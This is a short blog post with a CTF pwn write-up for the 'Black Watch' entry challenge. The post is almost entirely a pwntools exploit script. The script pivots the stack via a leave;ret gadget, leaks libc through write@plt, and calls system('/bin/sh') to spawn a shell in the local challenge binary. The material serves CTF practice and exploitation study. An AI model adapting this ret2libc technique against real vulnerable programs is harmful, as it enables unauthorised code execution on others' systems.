Eureka's Studio.

(栈转移)Black_Watch_入群题_PWN

Stack/Medium
2023/11/01

没啥特别要说的 以后可以再刷一次

[栈转移]Black Watch 入群题_PWN

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
sh = process('./spwn')
elf = ELF('./spwn')

write_plt = elf.plt['write']
write_got = elf.got['write']
main = elf.symbols['main']
s = 0x0804A300
leave_ret = 0x08048408

payload = 'aaaa' + p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(8)
sh.sendlineafter('What is your name?',payload)

payload1 = 'a' * 0x18 + p32(s) + p32(leave_ret)
sh.sendlineafter('What do you want to say?',payload1)
write_addr = u32(sh.recv(4))

libc = LibcSearcher('write',write_addr)
system_addr = write_addr - libc.dump('write') + libc.dump('system')
binsh_addr = write_addr - libc.dump('write') + libc.dump('str_bin_sh')

payload = 'aaaa' + p32(system_addr) + p32(main) + p32(binsh_addr)
sh.sendlineafter('What is your name?',payload)

payload1 = 'a' * 0x18 + p32(s) + p32(leave_ret)
sh.sendlineafter('What do you want to say?',payload1)
sh.interactive()

Author:Eureka

Link:https://dawoxiansigema.github.io/2023/11/01/Black-Watch-%E5%85%A5%E7%BE%A4%E9%A2%98-PWN/

Publish date:November 1st 2023, 10:15:09 am

Update date:November 1st 2023, 10:16:51 am

License:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. [栈转移]Black Watch 入群题_PWN
Total : 32
2023
2021
Forensic Heap Stack/Medium Stack/Basic Stack/Advanced Htb Fomatstring Fix